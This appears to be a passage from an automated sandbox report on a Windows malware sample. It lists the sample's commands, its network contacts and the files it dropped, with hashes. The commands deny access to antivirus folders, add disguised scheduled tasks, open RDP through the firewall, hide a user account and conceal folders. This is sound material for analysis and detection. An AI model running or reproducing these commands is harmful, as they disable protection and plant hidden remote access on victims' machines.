C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ipconfig /flushdns

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c gpupdate /force

C:\Windows\system32\gpupdate.exe

gpupdate /force

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 3 /NOBREAK

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -w

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\net.exe

net accounts /maxpwage:unlimited

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 accounts /maxpwage:unlimited

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper\*.*"

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper"

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\rdp"

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM 1.exe /T /F

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM P.exe /T /F

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

Network

Country Destination Domain Proto
NL 20.190.160.67:443 tcp
NL 20.190.160.67:443 tcp
NL 20.190.160.67:443 tcp
US 8.8.8.8:53 boglogov.site udp
US 8.8.8.8:53 boglogov.site udp
NL 20.190.160.8:443 tcp
NL 20.190.160.8:443 tcp
NL 20.190.160.8:443 tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 52.182.143.208:443 tcp
US 8.8.8.8:53 freemail.freehost.com.ua udp
UA 194.0.200.251:465 freemail.freehost.com.ua tcp
N/A 224.0.0.251:5353 udp
NL 20.190.160.2:443 tcp
NL 20.190.160.2:443 tcp
NL 20.190.160.2:443 tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
RU 109.248.203.81:21 tcp
NL 178.79.208.1:80 tcp
NL 178.79.208.1:80 tcp
NL 178.79.208.1:80 tcp
NL 20.190.160.136:443 tcp
NL 20.190.160.136:443 tcp
NL 20.190.160.136:443 tcp
NL 104.110.191.133:80 tcp
RU 152.89.218.85:80 taskhostw.com tcp
NL 20.190.160.73:443 tcp
NL 20.190.160.73:443 tcp
NL 20.190.160.73:443 tcp
NL 20.190.160.71:443 tcp
NL 20.190.160.71:443 tcp
NL 20.190.160.71:443 tcp

Files

memory/2312-130-0x0000000000000000-mapping.dmp

C:\ProgramData\Microsoft\Intel\wini.exe

MD5 f9a9b17c831721033458d59bf69f45b6
SHA1 472313a8a15aca343cf669cfc61a9ae65279e06b
SHA256 9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce
SHA512 653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8

C:\ProgramData\Microsoft\Intel\wini.exe

MD5 f9a9b17c831721033458d59bf69f45b6
SHA1 472313a8a15aca343cf669cfc61a9ae65279e06b
SHA256 9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce
SHA512 653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8

memory/2888-133-0x0000000000000000-mapping.dmp

C:\ProgramData\install\cheat.exe

MD5 c097289ee1c20ac1fbddb21378f70410
SHA1 d16091bfb972d966130dc8d3a6c235f427410d7f
SHA256 b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2
SHA512 46236dba79489272b6b7f9649fb8be5beb4a0b10776adf7b67ef3a9f969a977cde7a99b1b154b4b9142eb1bf72abcadbfd38abaef1eb88d7d03c646645517d0d

C:\programdata\install\cheat.exe

MD5 c097289ee1c20ac1fbddb21378f70410
SHA1 d16091bfb972d966130dc8d3a6c235f427410d7f
SHA256 b80857cd30e6ec64e470480aae3c90f513115163c74bb584fa27adf434075ab2
SHA512 46236dba79489272b6b7f9649fb8be5beb4a0b10776adf7b67ef3a9f969a977cde7a99b1b154b4b9142eb1bf72abcadbfd38abaef1eb88d7d03c646645517d0d

memory/4488-136-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\install.vbs

MD5 5e36713ab310d29f2bdd1c93f2f0cad2
SHA1 7e768cca6bce132e4e9132e8a00a1786e6351178
SHA256 cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931
SHA512 8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

C:\Programdata\Windows\install.bat

MD5 db76c882184e8d2bac56865c8e88f8fd
SHA1 fc6324751da75b665f82a3ad0dcc36bf4b91dfac
SHA256 e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a
SHA512 da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92

memory/3640-144-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\winit.exe

MD5 03a781bb33a21a742be31deb053221f3
SHA1 3951c17d7cadfc4450c40b05adeeb9df8d4fb578
SHA256 e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210
SHA512 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

C:\ProgramData\Windows\winit.exe

MD5 03a781bb33a21a742be31deb053221f3
SHA1 3951c17d7cadfc4450c40b05adeeb9df8d4fb578
SHA256 e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210
SHA512 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

C:\programdata\install\ink.exe

MD5 ef3839826ed36f3a534d1d099665b909
SHA1 8afbee7836c8faf65da67a9d6dd901d44a8c55ca
SHA256 136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040
SHA512 040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8

C:\ProgramData\install\ink.exe

MD5 ef3839826ed36f3a534d1d099665b909
SHA1 8afbee7836c8faf65da67a9d6dd901d44a8c55ca
SHA256 136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040
SHA512 040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8

memory/624-141-0x0000000000000000-mapping.dmp

memory/3596-140-0x0000000000000000-mapping.dmp

memory/2780-139-0x0000000000000000-mapping.dmp

C:\ProgramData\Microsoft\Intel\taskhost.exe

MD5 c5ec8996fc800325262f5d066f5d61c9
SHA1 95f8e486960d1ddbec88be92ef71cb03a3643291
SHA256 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db
SHA512 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

C:\ProgramData\Microsoft\Intel\taskhost.exe

MD5 c5ec8996fc800325262f5d066f5d61c9
SHA1 95f8e486960d1ddbec88be92ef71cb03a3643291
SHA256 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db
SHA512 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

memory/3416-149-0x0000000000000000-mapping.dmp

memory/3016-147-0x0000000000000000-mapping.dmp

memory/4776-151-0x0000000000000000-mapping.dmp

memory/3644-152-0x0000000000000000-mapping.dmp

memory/1276-153-0x0000000000000000-mapping.dmp

C:\ProgramData\Microsoft\Intel\P.exe

MD5 b78c384bff4c80a590f048050621fe87
SHA1 f006f71b0228b99917746001bc201dbfd9603c38
SHA256 8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b
SHA512 479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab

memory/864-157-0x0000000000000000-mapping.dmp

C:\programdata\microsoft\intel\P.exe

MD5 b78c384bff4c80a590f048050621fe87
SHA1 f006f71b0228b99917746001bc201dbfd9603c38
SHA256 8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b
SHA512 479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab

memory/940-158-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\reg1.reg

MD5 806734f8bff06b21e470515e314cfa0d
SHA1 d4ef2552f6e04620f7f3d05f156c64888c9c97ee
SHA256 7ae7e4c0155f559f3c31be25d9e129672a88b445af5847746fe0a9aab3e79544
SHA512 007a79f0023a792057b81483f7428956ab99896dd1c8053cac299de5834ac25da2f6f77b63f6c7d46c51ed7a91b8eccb1c082043028326bfa0bfcb47f2b0d207

memory/1628-159-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\reg2.reg

MD5 6a5d2192b8ad9e96a2736c8b0bdbd06e
SHA1 235a78495192fc33f13af3710d0fe44e86a771c9
SHA256 4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a
SHA512 411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

memory/4308-161-0x0000000000000000-mapping.dmp

memory/4184-162-0x0000000000000000-mapping.dmp

memory/424-163-0x0000000000000000-mapping.dmp

memory/1432-164-0x0000000000000000-mapping.dmp

memory/2924-165-0x0000000000000000-mapping.dmp

memory/1064-166-0x0000000000000000-mapping.dmp

memory/4388-167-0x0000000000000000-mapping.dmp

memory/4496-168-0x0000000000000000-mapping.dmp

memory/4240-169-0x0000000000000000-mapping.dmp

memory/3500-170-0x0000000000000000-mapping.dmp

memory/2196-171-0x0000000000000000-mapping.dmp

memory/1612-172-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

C:\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

memory/100-175-0x0000000000000000-mapping.dmp

memory/112-176-0x0000000000000000-mapping.dmp

memory/1612-177-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1612-178-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1612-179-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1612-180-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1612-181-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4484-182-0x0000000000000000-mapping.dmp

memory/3868-183-0x0000000000000000-mapping.dmp

memory/3808-184-0x0000000000000000-mapping.dmp

memory/1932-185-0x0000000000000000-mapping.dmp

memory/1612-186-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/3380-187-0x0000000000000000-mapping.dmp

memory/2640-188-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

memory/3180-190-0x0000000000000000-mapping.dmp

memory/2352-191-0x0000000000000000-mapping.dmp

memory/3644-193-0x0000000000000000-mapping.dmp

memory/1692-195-0x0000000000000000-mapping.dmp

memory/2640-194-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/2640-196-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/3924-197-0x0000000000000000-mapping.dmp

memory/3416-198-0x0000000000000000-mapping.dmp

memory/2640-199-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/2640-201-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/2412-200-0x0000000000000000-mapping.dmp

memory/2640-202-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4028-203-0x0000000000000000-mapping.dmp

memory/1432-205-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

memory/3220-204-0x0000000000000000-mapping.dmp

memory/2640-192-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1840-208-0x0000000000000000-mapping.dmp

memory/1432-207-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4624-210-0x0000000000000000-mapping.dmp

memory/2316-209-0x0000000000000000-mapping.dmp

memory/1432-211-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1004-212-0x0000000000000000-mapping.dmp

memory/1432-213-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1432-214-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/2632-216-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\rutserv.exe

MD5 37a8802017a212bb7f5255abc7857969
SHA1 cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA256 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA512 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

memory/4036-219-0x0000000000000000-mapping.dmp

memory/4228-218-0x0000000000000000-mapping.dmp

memory/1432-215-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4288-220-0x0000000000000000-mapping.dmp

memory/2372-221-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/2372-222-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/2372-223-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/1148-226-0x0000000000000000-mapping.dmp

memory/2372-225-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4268-227-0x0000000000000000-mapping.dmp

memory/2040-224-0x0000000000000000-mapping.dmp

memory/2372-228-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/4044-229-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\rfusclient.exe

MD5 b8667a1e84567fcf7821bcefb6a444af
SHA1 9c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256 dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512 ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

C:\ProgramData\Windows\vp8encoder.dll

MD5 6298c0af3d1d563834a218a9cc9f54bd
SHA1 0185cd591e454ed072e5a5077b25c612f6849dc9
SHA256 81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172
SHA512 389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

C:\ProgramData\Windows\vp8decoder.dll

MD5 88318158527985702f61d169434a4940
SHA1 3cc751ba256b5727eb0713aad6f554ff1e7bca57
SHA256 4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74
SHA512 5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

memory/1968-234-0x0000000000000000-mapping.dmp

memory/3468-233-0x0000000000000000-mapping.dmp

memory/4488-235-0x0000000000000000-mapping.dmp

memory/1432-236-0x0000000000400000-0x0000000000AB9000-memory.dmp

memory/3524-237-0x0000000000000000-mapping.dmp

memory/4536-238-0x0000000000000000-mapping.dmp

memory/5076-240-0x0000000000000000-mapping.dmp

memory/4464-239-0x0000000000000000-mapping.dmp

C:\ProgramData\Windows\rfusclient.exe

MD5 b8667a1e84567fcf7821bcefb6a444af
SHA1 9c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256 dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512 ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

C:\ProgramData\Windows\rfusclient.exe

MD5 b8667a1e84567fcf7821bcefb6a444af
SHA1 9c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256 dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512 ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

memory/3116-244-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/1696-245-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3116-246-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/1696-247-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/1696-249-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3116-248-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3116-250-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/1696-253-0x0000000000400000-0x00000000009B6000-memory.dmp

C:\programdata\microsoft\intel\R8.exe

MD5 ad95d98c04a3c080df33ed75ad38870f
SHA1 abbb43f7b7c86d7917d4582e47245a40ca3f33c0
SHA256 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd
SHA512 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

memory/3116-254-0x0000000000400000-0x00000000009B6000-memory.dmp

C:\ProgramData\Microsoft\Intel\R8.exe

MD5 ad95d98c04a3c080df33ed75ad38870f
SHA1 abbb43f7b7c86d7917d4582e47245a40ca3f33c0
SHA256 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd
SHA512 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

memory/1696-243-0x0000000000400000-0x00000000009B6000-memory.dmp

C:\rdp\run.vbs

MD5 6a5f5a48072a1adae96d2bd88848dcff
SHA1 b381fa864db6c521cbf1133a68acf1db4baa7005
SHA256 c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe
SHA512 d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c

C:\rdp\pause.bat

MD5 a47b870196f7f1864ef7aa5779c54042
SHA1 dcb71b3e543cbd130a9ec47d4f847899d929b3d2
SHA256 46565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba
SHA512 b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60

C:\Programdata\Install\del.bat

MD5 398a9ce9f398761d4fe45928111a9e18
SHA1 caa84e9626433fec567089a17f9bcca9f8380e62
SHA256 e376f2a9dda89354311b1064ea4559e720739d526ef7da0518ebfd413cd19fc1
SHA512 45255ffea86db71fcfcde1325b54d604a19276b462c8cca92cf5233a630510484a0ecb4d3e9f66733e2127c30c869c23171249cfac3bb39ff4e467830cd4b26b

C:\Program Files\Common Files\System\iediagcmd.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\ProgramData\Microsoft\Intel\winlog.exe

MD5 4b2dbc48d42245ef50b975a7831e071c
SHA1 3aab9b62004f14171d1f018cf74d2a804d74ef80
SHA256 54eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724
SHA512 f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd

C:\ProgramData\Microsoft\Intel\winlog.exe

MD5 4b2dbc48d42245ef50b975a7831e071c
SHA1 3aab9b62004f14171d1f018cf74d2a804d74ef80
SHA256 54eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724
SHA512 f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd

C:\ProgramData\Microsoft\Intel\winlogon.exe

MD5 2f6a1bffbff81e7c69d8aa7392175a72
SHA1 94ac919d2a20aa16156b66ed1c266941696077da
SHA256 dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de
SHA512 ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

C:\ProgramData\Microsoft\Intel\winlogon.exe

MD5 2f6a1bffbff81e7c69d8aa7392175a72
SHA1 94ac919d2a20aa16156b66ed1c266941696077da
SHA256 dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de
SHA512 ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

C:\Users\Admin\AppData\Local\Temp\4769.tmp\476A.bat

MD5 cfc53d3f9b3716accf268c899f1b0ecb
SHA1 75b9ae89be46a54ed2606de8d328f81173180b2c
SHA256 f293caa096cc51a511cedd76fd011a275fb8a30b6a93542ded718930a7d12ee9
SHA512 0c090e2ed2f3f7b2c00cbb6583df5723a3d0781738eafc37b2e630f46b5b470a5a7dbc44a2f2e8d043f83c753ddf5f72b1d67c0a7e73241e47cd24c92b4ce7d4

memory/5560-264-0x0000028323370000-0x0000028323392000-memory.dmp

C:\ProgramData\microsoft\Temp\5.xml

MD5 487497f0faaccbf26056d9470eb3eced
SHA1 e1be3341f60cfed1521a2cabc5d04c1feae61707
SHA256 9a8efbd09c9cc1ee7e8ff76ea60846b5cd5a47cdaae8e92331f3b7b6a5db4be5
SHA512 3c6b5b29c0d56cfd4b717a964fac276804be95722d78219e7087c4ec787566f223e24421e0e3e2d8a6df5f9c9a5c07f1935f4ba7a83a6a3efa84866e2c1405dd

C:\ProgramData\Windows\rfusclient.exe

MD5 b8667a1e84567fcf7821bcefb6a444af
SHA1 9c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256 dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512 ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

memory/3608-267-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3608-268-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3608-269-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3608-270-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/3608-271-0x0000000000400000-0x00000000009B6000-memory.dmp

memory/5560-272-0x00007FFD618A0000-0x00007FFD62361000-memory.dmp

memory/3608-273-0x0000000000400000-0x00000000009B6000-memory.dmp

C:\Programdata\RealtekHD\taskhostw.exe

MD5 639a6e9e1949265f493c1a3505bc3430
SHA1 416384c79557c0a2d1e56e9449ac04d71c9f3477
SHA256 a0bb963a090b975d79786265a0f5fe6b61b8bfcc1bc623559b64b1b9939897fd
SHA512 57400dc5e6e3dbb12cca0141f316b385f1705efd154f6dbfcdc5a109c26ca8e1138c94a46c2811d14e85468d5acc9a4422c0d4e07e9d78fa6a69aeaccf733cb7

C:\ProgramData\RealtekHD\taskhostw.exe

MD5 639a6e9e1949265f493c1a3505bc3430
SHA1 416384c79557c0a2d1e56e9449ac04d71c9f3477
SHA256 a0bb963a090b975d79786265a0f5fe6b61b8bfcc1bc623559b64b1b9939897fd
SHA512 57400dc5e6e3dbb12cca0141f316b385f1705efd154f6dbfcdc5a109c26ca8e1138c94a46c2811d14e85468d5acc9a4422c0d4e07e9d78fa6a69aeaccf733cb7

